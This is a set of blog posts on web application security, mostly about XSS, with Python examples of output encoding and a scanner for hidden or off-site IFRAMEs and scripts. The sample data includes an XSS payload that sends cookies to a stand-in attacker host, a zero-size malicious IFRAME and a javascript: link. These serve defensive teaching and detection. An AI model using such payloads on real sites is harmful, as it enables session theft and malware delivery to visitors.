Sunday, March 28, 2010

Interesting (No) Show of Hands

Yesterday I spoke at CodeCamp 13 in Waltham, MA about web app security. Two talks, one for XSS and SQL Injection, the other for CSRF and discussion about the rest of the OWASP Top 10 list. During the first session I asked a set of questions to see first-hand whether what I had suspected was true. People were to raise their hand if the first question was a "yes" answer and leave it up until they answered "no" to a question.

Here is the set of questions, in order. Note the spot where you can't answer a question with a "Yes".
  1. Do you build web sites/apps, web services, or windows apps that use a browser control?

  2. Do you know what SQL Injection is?
  3. Do you know how it works?
  4. Do you actively code against SQL Injection attacks?

  5. Do you know what XSS is?
  6. Do you know how it works?
  7. Do you actively code against XSS attacks?
Did you answer "yes" to all seven questions? I had 26 people in the talk and almost all raised their hand for the first question, which makes sense. After all seven questions, not a single hand was left up. There were 3 or 4 people who made it through six of the seven questions, but no one actively codes against those attacks.

THOSE ATTACKS ARE THE TOP TWO OUT IN THE WILD AND EXPECTED TO BE A RISK FOR 2010!

Think about this for a second. This was at a CodeCamp, where real developers go. There were hundreds of developers that didn't attend the event. There were 26 people in the room with me, so those were the ones most interested in security. There were dozens and dozens attending other sessions at the event at the same time, missing my talks by choice. So the people most likely to be good at protecting their sites are not actively protecting their sites against the top two attacks. Granted some gurus there likely didn't attend my talks since they already do all the work and didn't need them, but this is a clear statement to me about what is not happening in the development community.

Do I blame those folks that attended my session(s)? No way. They had great questions, were honestly concerned, and I know they left with a desire to turn things around. They were a great bunch for sure. But I hope it showed them, as it did me, that this is the norm. There is a lot of work left to be done to educate people on secure web app development. Hopefully the army is a little bigger after yesterday.

Reflected vs Persistent XSS

Most of us by now know what XSS is, how it works and how to stop it. But you may be hearing a bit more now about "reflected XSS" or "persistent XSS". What are they and how are they different, and most of all does it matter?

Reflected XSS

Reflected XSS is when the script rides along in the request itself, usually in a URL parameter, and the page echoes it straight back into the response without encoding it. The attacker sends the victim a link to the vulnerable page with the script already in it, and the victim's browser runs it. For example, think of search engine pages. If the results page prints "Results for <whatever you typed>" and the attacker types script into the search box, the results page comes back with that script in it, and he/she can send you a link to that exact search. When you click on the link YOU get the compromised search results and the attacker has you right where they want you...script running in your browser, on that site's origin, automatically.

Many times reflected XSS is used to grab your session cookies so the attacker can impersonate you (the script just sends document.cookie off to a server they control, unless the cookie is marked HttpOnly), but obviously it can be for other things too. The one thing it needs that persistent XSS doesn't is getting the victim to click the link, which is why it shows up in email, IMs and links on other pages.

Persistent XSS

Persistent (or stored) XSS is where the malicious script gets saved on the site, through user input the site stores and replays, and is then served to every visitor who loads that page. The victim is going to a legitimate page that happens to carry a malicious post (think discussion forum on a legit site, a profile page, a comment). There is no link to click: the script is already on the page, waiting. A site that hosts malicious script on purpose is a different animal, a plain malicious site rather than an XSS hole, but from your browser's point of view the result is the same.

One thing attackers are doing these days with persistent XSS is using it to push malware onto your machine. The injected script redirects you, or pops up a message telling you that you need to download a codec to view a file on the site. You accept the download and get the malware.

Thoughts


Something we can agree on is that we can all avoid going to malicious sites for the most part. We just stick to nice neighborhoods and avoid the skeevy ones. But malicious posts on trusted sites are hard to avoid. Consider StackOverflow.com. You go there to solve a tech problem and you hit a post with 15 replies. You get all 15 replies, like it or not, and each one may pull in images and other resources. Before you go to the page, do you know if the page has a malicious script on it? You open the page and BOOM, everything runs...ain't a thing you can do about it either, because that script runs with the same access to the site that you have. (Don't worry, StackOverflow does not have this vulnerability, but do you know if other sites you hit are not vulnerable?)

Using something like the NoScript Firefox plugin is a smart thing. It blocks scripts until you allow them for a site. So the one bad post out of 15 will have its malicious script blocked unless you say it is ok to go to http://malicious_site.com and pull their script (in that case shame on you). One caveat: NoScript's whitelist is per site, so if a bad post injects inline script into a site you have already allowed, that script runs like any other script on the page. It helps a lot against the third-party script and IFRAME case, and its built-in XSS filter catches a good share of reflected attacks, but it is not a substitute for the site fixing its own output.

Final Thought

So now you know reflected and persistent XSS attacks. Do their differences matter? Maybe, but only from you being a USER so you know what to look for or watch out for. IM's, email links, links on pages, etc. Being a web dev, it doesn't matter at all. Stop allowing XSS on your sites, period. You block them the same way: treat every bit of data you didn't generate yourself, whether it came off the query string a second ago or out of your database a year ago, as untrusted, and encode it for the exact context it lands in (HTML body, attribute, JavaScript, URL) at the moment you write it into the page. Whitelist what input you accept too, but encoding on output is what actually stops the script from running. Stop making excuses and get your site plugged, which stops both kinds of XSS cold.
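Here is what that looks like in code, as an added example and not something from the talk or from any real site: a Python rendering of the search page from the reflected case and of a forum thread from the persistent case, each written the vulnerable way and then the fixed way. The URL, host names, query string, forum posts and the helper names (query_param, safe_href, has_active_markup) are all made up for the demo. It also shows the one spot where plain encoding is not enough, a URL attribute, where a javascript: link has to be refused outright.

```python
import html
from urllib.parse import parse_qs, urlsplit

# ---- Constructed sample data (made up for this example) --------------------

# Reflected case: the link the attacker mails you. The search term in the query
# string is a script that ships your cookies off to the attacker's server.
ATTACK_LINK = (
    "http://example.test/search?q=%3Cscript%3Enew%20Image().src%3D"
    "%27http%3A%2F%2Fmalicious_site.com%2F%3Fc%3D%27%2Bdocument.cookie"
    "%3C%2Fscript%3E"
)

# Persistent case: posts already sitting in the forum database. The second one
# carries a zero-size IFRAME and a javascript: homepage link.
STORED_POSTS = [
    {"body": "Clearing the temp folder fixed it for me.",
     "homepage": "http://example.test/~alice"},
    {"body": '<iframe src="http://malicious_site.com/codec" width="0" height="0"></iframe>',
     "homepage": "javascript:alert(document.cookie)"},
]


def query_param(url, name):
    """Pull one decoded parameter out of a URL's query string."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


# ---- The vulnerable way: untrusted text dropped straight into the page ------

def search_page_vulnerable(url):
    q = query_param(url, "q")
    return f"<h1>Results for {q}</h1>"          # reflected: echoes the script


def thread_vulnerable(posts):
    return "".join(                                # persistent: replays the post
        f'<div class="post"><a href="{p["homepage"]}">home</a>{p["body"]}</div>'
        for p in posts
    )


# ---- The fixed way: encode for the context the data lands in ---------------

def safe_href(url):
    """URL attribute context. Attribute encoding cannot neutralize a
    javascript: URL (it is still a valid link), so whitelist the scheme first
    and only then encode; anything else becomes an inert '#'."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def search_page_fixed(url):
    q = query_param(url, "q")
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"   # HTML body context


def thread_fixed(posts):
    # Same fix, same function, whether the data arrived a second ago (reflected)
    # or was stored a year ago (persistent): escape at the point of output.
    return "".join(
        f'<div class="post"><a href="{safe_href(p["homepage"])}">home</a>'
        f'{html.escape(p["body"], quote=True)}</div>'
        for p in posts
    )


def has_active_markup(page):
    """Demo check only (not an XSS filter): does the page still contain a live
    script/iframe tag or a javascript: URL?"""
    low = page.lower()
    return "<script" in low or "<iframe" in low or "javascript:" in low


if __name__ == "__main__":
    for label, page in (
        ("reflected, vulnerable ", search_page_vulnerable(ATTACK_LINK)),
        ("reflected, fixed      ", search_page_fixed(ATTACK_LINK)),
        ("persistent, vulnerable", thread_vulnerable(STORED_POSTS)),
        ("persistent, fixed     ", thread_fixed(STORED_POSTS)),
    ):
        print(f"{label}: script can run = {has_active_markup(page)}")
        print("   ", page)
```

Run it and the two vulnerable renderers hand the browser a live script tag and a live IFRAME; the two fixed ones emit the same text as harmless &lt;...&gt; entities and turn the javascript: link into "#". Notice the fix never inspects where the data came from; it only cares where it is going.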

Wednesday, March 17, 2010

About eBay Vulnerabilities

So mid-February it was announced that eBay had some exploitable parts. Not cool! Guess what they involved? One had cross-site scripting (XSS) and another had SQL Injection. A third, that may still be unpatched, is a cross-site request forgery (CSRF) hole. Huh. Surprise surprise! These are the top holes, and have been railed about for years, literally. And here is another example of a big company with lots of developers with those old holes in place. Granted CSRF is tricky and sorta new, at least newly being exploited. But XSS and SQL Injection? Wow. The holes were in rather non-standard pages, but doesn't the mini basement window at the back of your house still get you in, where you can unlock the front door from the inside?

No more excuses! Patch those holes BEFORE you become a news headline! Oh, speaking of which: http://www.esecurityplanet.com/headlines/article.php/3866011/eBay-Vulnerabilities-Found.htm

Here is a good paper on what the top holes are and how to fix 'em: http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf. And in the coming weeks I'll give a full explanation of SQL Injection and CSRF to help you if you need it.

Sunday, February 28, 2010

Why a Crippling Attack Against US Companies is Very Possible

Sure, some people are doomsayers and we look at them as fringe folks with a grain of truth expanded out to being an entire movement. I'm not being a doomsayer, but a realist, when I say that a concerted web attack on US companies is very possible.

First, in America we believe we are invincible and the smartest, most savvy people on the earth. We are prideful and boastful and believe we deserve every good thing, whether we work for it or not. I know that is a generalization but look around at the people in your neighborhood...I may not be describing YOU but look around you. In the "You serve me" mentality, people think security is someone else's thing, and that others will protect them. In companies, I've seen it where dollars outweigh quality and bad software gets shipped. If they are cutting corners on functionality, do you think they are even doing security on the pieces they create?

Second, we all know security is not "baked in" yet. It is something people add on top of the functionality that makes them money, if they get time. And right now times are tough financially...do you think companies are going to invest in baking security into the software lifecycle? While cutting jobs or shipping them overseas? While cutting corners and costs?

But the bad guys aren't taking time off to let us retool. What happened to Google and Intel and other companies lately is going to continue. Our image of everyone else in the world being less intelligent than us leads us to both our lack of diligence and to their anger against us. Do IT folks (and comical TV ads) bash Microsoft for just the same reasons of them being the arrogant big guy? Like it or not, people are putting our machines under their silent control and putting things in our hands to use against our own companies, government agencies, etc. Some of these botnets are for spam but it is clear now that no one is immune to flat out attack. A little social engineering and mom & pop machine takeover and you have a virtual army set to strike.

Recent stats say that 3-10% of all corporate PCs are compromised right now with malware that most likely puts them into a botnet. These are the places with good protections in place.

This blog started because I was floored at how many developers in big named companies were building sites with big security flaws. I assumed the little guys weren't doing security the best but to see some big companies not doing it floors me. As "invincible" Americans we learn many lessons the hard way and it is not going to do us, and the country we love, any good to learn this lesson that way.

If you are not learning about web security today, and making sure your sites don't allow for attack on/by them, then you are giving some really bad, money-driven people a foothold, a soldier. Enough footholds and you have an army.

My thinking is that many of the devs won't read this post at all even if presented with it, and if they do read it they will poo-poo it as someone else's concern or some doomsayer's rant. It is the way we are as humans and Americans, and we run a strong risk of falling hard simply by not doing the grunt work today.

Saturday, February 27, 2010

Chilean Earthquake search results and your code

So after this morning's earthquake in Chile, it appears that the lovely new (and effective) fake anti-virus software is being propagated out through bad web sites that have cloaked themselves as being about the earthquake and had gotten themselves to the top of the search results on engines like Google. Unwary clickers would go to their site and voila, you've got a virus and they'd LOOOVE to fix it for you. Sigh. Sure, the bad sites will start going further down the list as the day wears on and real sites start getting back to the top based on volume and people linking to those articles.

"Whew!" you say, "Better that this isn't something that is on MY site! Man I could get in trouble for that!" Well, other than just plain old bad sites willingly hosting the fake anti-virus software, you have to be aware that there are other valid sites that the software is coming from (until it is noticed and removed). Is it one of yours?

If your site allows XSS, especially if you host a forum or discussion group at all, you may have links right to that software ON YOUR SITE. You have to make sure you have XSS covered in all places, not just the obvious form fields. If I were the attacker, I'd set up the bad site sitting in the search results to have an IFRAME that points to a page on your site, and the post I planted on your site would carry another hidden (zero-size) IFRAME that grabs the software from a third server. Your site is the middle link in that chain, with your domain name lending it credibility, and you may be an unwitting contributor to today's malware distribution.
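One way to answer "Is it one of yours?" is to scan the pages your site actually serves for embedded content you did not put there. This is an added example, not code from the post or from any product: a Python scanner built on the standard library's HTMLParser that flags IFRAME, SCRIPT, OBJECT and EMBED tags whose source is off-site, plus IFRAMEs that are sized to zero or styled hidden, which is exactly the shape of the middle link in the chain described above. The sample page, the host names (example.test, attacker.invalid) and the function names are constructed for the demo.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample (not a real site): a forum thread page as your server
# serves it after a bad post got through. One post carries a zero-size IFRAME
# to a staging host, another pulls a loader script from it; the rest is clean.
SAMPLE_PAGE = """<html><body>
<script src="/static/site.js"></script>
<div class="post">Try rebuilding the index.</div>
<div class="post">See <a href="http://example.test/kb/42">KB 42</a>
<iframe src="http://attacker.invalid/stage2" width="0" height="0" frameborder="0"></iframe>
</div>
<div class="post"><script src="//attacker.invalid/js/loader.js"></script>thanks!</div>
<iframe src="http://example.test/ads/house" width="300" height="250"></iframe>
</body></html>
"""

# Tags that pull executable or framed content, and the attribute holding its URL.
EMBED_TAGS = {"iframe": "src", "script": "src", "object": "data", "embed": "src"}


class EmbedFinder(HTMLParser):
    """Walks the markup and records embeds that are off-site or hidden."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        a = dict(attrs)
        ref = a.get(EMBED_TAGS[tag])
        if not ref:
            return                      # inline <script> bodies are out of scope here
        # netloc is '' for relative URLs and is filled in for scheme-relative
        # '//host/...' ones, so both forms are handled.
        host = urlsplit(ref).netloc.lower()
        offsite = bool(host) and host not in self.own_hosts
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = tag == "iframe" and (
            a.get("width") == "0" or a.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style
        )
        if offsite or hidden:
            self.findings.append({
                "line": self.getpos()[0], "tag": tag, "url": ref,
                "offsite": offsite, "hidden": hidden,
            })


def find_suspect_embeds(markup, own_hosts):
    """Return the suspicious embeds found in `markup`, in page order."""
    finder = EmbedFinder(own_hosts)
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for f in find_suspect_embeds(SAMPLE_PAGE, ["example.test"]):
        flags = ", ".join(k for k in ("offsite", "hidden") if f[k])
        print(f"line {f['line']}: <{f['tag']}> {f['url']}  [{flags}]")
```

Point it at your own rendered pages (or straight at the stored post bodies) with your real host names in own_hosts. Your own ad frame and your own static script pass; the zero-size IFRAME and the scheme-relative loader script from attacker.invalid are the two hits. It is a check, not a fix: the fix is still encoding on output so the tags never get rendered in the first place.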

Lock it up and keep your sites out of the mix!